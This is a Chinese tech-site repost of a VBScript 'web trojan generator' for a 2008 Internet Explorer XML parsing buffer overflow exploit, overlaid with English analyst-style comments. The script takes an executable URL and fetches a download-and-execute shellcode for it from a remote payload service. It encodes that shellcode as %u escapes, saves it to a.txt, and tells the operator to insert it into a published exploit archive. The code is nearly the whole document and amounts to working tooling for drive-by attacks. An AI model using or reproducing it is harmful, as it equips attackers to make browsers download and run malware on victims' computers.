
网马生成器 MS Internet Explorer XML Parsing Buffer Overflow Exploit (vista) 0day

2017年12月08日  | 移动技术网IT编程  | 我要评论
'code by lcx
' Analyst summary: this script-level section asks the operator for the URL of
' an executable, requests a "win32_downloadexec" payload for that URL from a
' remote payload-generation web page, and reduces the returned page to a bare
' string of \xNN escapes held in the variable "code".

' From here on every runtime error is silently ignored, so a failed request or
' a failed regex match still falls through to the later statements.
on error resume next
' Interactive prompt; the third argument is the pre-filled default value.
exeurl = inputbox( "请输入exe的地址:", "输入", "http://www.haiyangtop.net/333.exe" )
' Request URL: plain http to a hard-coded host and port, with the encoded
' executable URL passed as opt_url. Defensive note: this outbound request,
' issued by a script host process, is the main network observable here.
url="http://www.metasploit.com:55555/payloads?parent=glob%280x25bfa38%29&module=win32_downloadexec&mode=generate&opt_url="&urlencoding(exeurl)&"&maxsize=&badchars=0x00+&encoder=default&action=generate+payload"


' Fetch the generated page as text (decoded as gb2312 inside gethttppage).
body = gethttppage(url)
set re = new regexp
' Intended to capture from "$shellcode =" up to the closing "</div></pre>".
' NOTE(review): as printed, the character class matches whitespace only, so
' this may not match real output; in that case body keeps the whole page.
re.pattern = "(\$shellcode \=[\s\s]+</div></pre>)"

set matches = re.execute(body)
if matches.count>0 then body = matches(0).value

' Strip the "$shellcode =" prefix, double quotes (chr(34)), CR/LF, ";",
' the closing tags and "." so that only the concatenated escapes remain.
code=trim(replace(replace(replace(replace(replace(replace(replace(body,"$shellcode =",""),chr(34),""),chr(13),""),";",""),"</div></pre>",""),chr(10),""),".",""))

' Converts pairs of "\xNN" escapes in str into "%uNNNN" escapes.
' Each match is two consecutive \xNN groups; the replacement emits the second
' byte before the first ("%u$2$1"), i.e. the pair is byte-swapped into one
' 16-bit unit. Matching is case-insensitive and applies to every pair in str.
' Defensive note: long runs of %uXXXX escapes in page script are a common
' detection cue for encoded binary payloads in browser-exploit pages.
function replaceregex(str)
set regex=new regexp
' "." matches any character, so the two captured characters are not checked
' to be hex digits.
regex.pattern="\\x(..)\\x(..)"
regex.ignorecase=true
regex.global=true
matches=regex.replace(str,"%u$2$1")
replaceregex=matches
end function


' Fetches the resource at "path" and returns it as text.
' The raw response bytes come from getbody and are decoded as gb2312 by
' bytestobstr; no status or content check is made on the response.
function gethttppage(path)
    gethttppage = bytestobstr(getbody(path), "gb2312")
end function

' Performs a synchronous HTTP GET of "url" and returns the raw response body.
' Errors are suppressed: if the object cannot be created or the request fails,
' the function simply returns without a value and the caller is not told.
' Defensive note: a script host instantiating microsoft.xmlhttp and making an
' outbound request is the behavior endpoint monitoring would see here.
function getbody(url)
    on error resume next
    dim http
    set http = createobject("microsoft.xmlhttp")
    ' Third argument false = blocking call; empty user name and password.
    http.open "get", url, false, "", ""
    http.send
    getbody = http.responsebody
    set http = nothing
end function

' Decodes a binary buffer into a string using the character set named in cset.
' The bytes are written to an in-memory adodb.stream in binary mode, the stream
' is rewound, switched to text mode with the requested charset, and read back.
function bytestobstr(body, cset)
    const adtypebinary = 1
    const adtypetext = 2
    const admodereadwrite = 3
    dim stm
    set stm = createobject("adodb.stream")
    with stm
        .type = adtypebinary
        .mode = admodereadwrite
        .open
        .write body
        ' Rewind before changing the stream type and reading as text.
        .position = 0
        .type = adtypetext
        .charset = cset
        bytestobstr = .readtext
        .close
    end with
    set stm = nothing
end function

' Percent-encodes only the characters of vstrin whose character code has a
' magnitude of &hff or more; all other characters, including URL-reserved
' ones, are copied through unchanged.
' An encoded character is emitted as two "%" groups built from the high and
' low part of its code, using hex() without zero padding.
function urlencoding(vstrin)
    dim encoded, pos, ch, codepoint, hipart, lopart
    encoded = ""
    for pos = 1 to len(vstrin)
        ch = mid(vstrin, pos, 1)
        codepoint = asc(ch)
        if abs(codepoint) >= &hff then
            ' asc() can return a negative code; shift it into the positive range.
            if codepoint < 0 then codepoint = codepoint + &h10000
            hipart = (codepoint and &hff00) \ &hff
            lopart = codepoint and &hff
            encoded = encoded & "%" & hex(hipart) & "%" & hex(lopart)
        else
            encoded = encoded & ch
        end if
    next
    urlencoding = encoded
end function

' Output stage: writes the converted payload string to a.txt in the current
' directory and echoes it through the script host.
' Defensive note: the file write by a script host process right after the
' outbound request is the on-disk observable of this script.
set fso=createobject("scripting.filesystemobject")
' Mode 2 opens for writing (overwriting existing content); true creates the
' file if it does not exist.
set files=fso.opentextfile("a.txt",2,true)
files.writeline replaceregex(code)
'files.writeline body
wscript.echo replaceregex(code)
files.close
set fso=nothing

' Final message to the operator: it says a.txt was generated and that its
' content is meant to replace the shellcode1 value in the referenced archive.
wscript.echo chr(13)&"ok,生成a.txt,请用a.txt里的替换http://milw0rm.com/sploits/2008-iesploit.tar.gz里的shellcode1内容即可"
